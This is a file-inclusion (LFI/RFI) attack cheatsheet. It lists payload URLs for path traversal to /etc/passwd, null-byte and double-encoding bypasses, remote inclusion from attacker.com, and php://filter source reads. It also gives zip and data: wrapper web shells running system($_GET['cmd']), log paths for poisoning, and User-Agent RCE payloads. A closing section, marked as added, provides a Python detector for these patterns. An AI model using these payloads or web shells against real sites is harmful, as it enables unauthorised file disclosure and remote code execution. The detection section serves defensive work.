📀LFI Cheatsheet
File Inclusion Cheatsheet
Basics:
http://vulnerable-site.com/index.php?page=../../../etc/passwd
http://vulnerable-site.com/index.php?page=....//....//....//etc/passwd
http://vulnerable-site.com/index.php?page=....\/....\/....\/etc/passwd
http://vulnerable-site.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
--------------------------------------------------------------------
Null Byte Injection:
http://vulnerable-site.com/index.php?page=/etc/passwd%00
http://vulnerable-site.com/index.php?page=/etc/passwd()
http://vulnerable-site.com/index.php?page=../../../etc/passwd%00
http://vulnerable-site.com/index.php?page=../../../etc/passwd%00.png
--------------------------------------------------------------------
Encoding:
http://vulnerable-site.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://vulnerable-site.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://vulnerable-site.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://vulnerable-site.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
--------------------------------------------------------------------
From an Existent Folder:
http://vulnerable-site.com/index.php?page=utils/scripts/../../../../../etc/passwd
--------------------------------------------------------------------
Path Truncation:
http://vulnerable-site.com/index.php?page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://vulnerable-site.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://vulnerable-site.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://vulnerable-site.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
--------------------------------------------------------------------
Filter Bypass:
http://vulnerable-site.com/index.php?page=....//....//etc/passwd
http://vulnerable-site.com/index.php?page=..///////..////..//////etc/passwd
http://vulnerable-site.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://vulnerable-site.com/index.php?page=/var/www/../../etc/passwd
--------------------------------------------------------------------
RFI:
http://vulnerable-site.com/index.php?page=http://attacker.com/evil.php
http://vulnerable-site.com/index.php?page=\\attacker.com\evil.php
--------------------------------------------------------------------
PHP Wrappers: filter
php://filter/resource=file name here
http://vulnerable-site.com/index.php?page=php://filter/convert.base64-encode/resource=file name here
http://vulnerable-site.com/index.php?page=php://filter/read=string.rot13/resource=/etc/passwd
http://vulnerable-site.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://vulnerable-site.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index
Bonus:
You can also create a polyglot payload by infecting the reflected PHP error with an XSS payload as an invalid filter:
php://filter/<script>alert(1)<%2fscript>/resource=flag.txt
--------------------------------------------------------------------
PHP wrapper: zlib
http://vulnerable-site.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
--------------------------------------------------------------------
PHP wrapper: ZIP
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://vulnerable-site.com/index.php?page=zip://shell.jpg%23payload.php
--------------------------------------------------------------------
PHP wrapper: Data
http://vulnerable-site.com/?page=data:text/plain,<?system($_GET['x']);?>&x=ls
http://vulnerable-site.com/?page=data:,<?system($_GET['x']);?>&x=ls
http://vulnerable-site.com/?page=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls
http://vulnerable-site.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://vulnerable-site.com/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
The payload: "<?php system($_GET['cmd']);"
--------------------------------------------------------------------
Common log Files:
/var/www/logs/access.log
/var/log/apache/access.log
/etc/httpd/logs/access_log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
--------------------------------------------------------------------
User-Agents payloads to Get RCE:
<?php phpinfo(); ?>
<?php echo system('env') ?>
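--------------------------------------------------------------------
Detection (added example, not part of the original cheatsheet):
For reviewing access logs or filtering requests, this sketch normalizes a `page` parameter value the way the Encoding, Null Byte, Filter Bypass and wrapper sections imply it must be, then reports which pattern families it matches. The function names and finding labels are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Schemes from this page (plus https) and UNC paths; case-insensitive
# because PHP accepts mixed case such as pHp://FilTer.
SCHEMES = re.compile(r"^((php|zip|https?)://|data:)|^\\\\", re.I)
# Overlong UTF-8 forms of "." and "/" (%c0%ae, %c0%af).
OVERLONG = re.compile(rb"\xc0[\xae\xaf]")
# A path segment made only of two or more dots.
TRAVERSAL = re.compile(r"(^|/)\.{2,}(/|$)")

def normalize(value, max_rounds=5):
    """Percent-decode until stable so %252f and %2f both become '/'."""
    data, rounds = value.encode("latin-1", "replace"), 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data, rounds

def classify(value):
    """Return the set of findings for one request parameter value."""
    data, rounds = normalize(value)
    findings = set()
    if rounds > 1:
        findings.add("multi-encoded")
    if OVERLONG.search(data):
        findings.add("overlong-utf8")
        data = data.replace(b"\xc0\xaf", b"/").replace(b"\xc0\xae", b".")
    if b"\x00" in data:
        findings.add("null-byte")
    text = data.decode("utf-8", "replace")
    if SCHEMES.search(text):
        findings.add("wrapper-or-remote")
    # Backslashes count as separators and repeated slashes collapse, so
    # "..\/", "..////" and "%5c.." are all judged as "../".
    path = re.sub(r"/+", "/", text.replace("\\", "/"))
    if TRAVERSAL.search(path):
        findings.add("traversal")
    return findings

if __name__ == "__main__":
    # Constructed sample values, taken from the patterns on this page.
    for sample in ("..%252f..%252fetc%252fpasswd", "....//....//etc/passwd",
                   "pHp://FilTer/convert.base64-encode/resource=index", "home"):
        print(sample, sorted(classify(sample)))
```

Pattern matching of this kind is a logging and alerting aid; the include itself should resolve the parameter against a fixed allowlist of page names rather than rely on filtering.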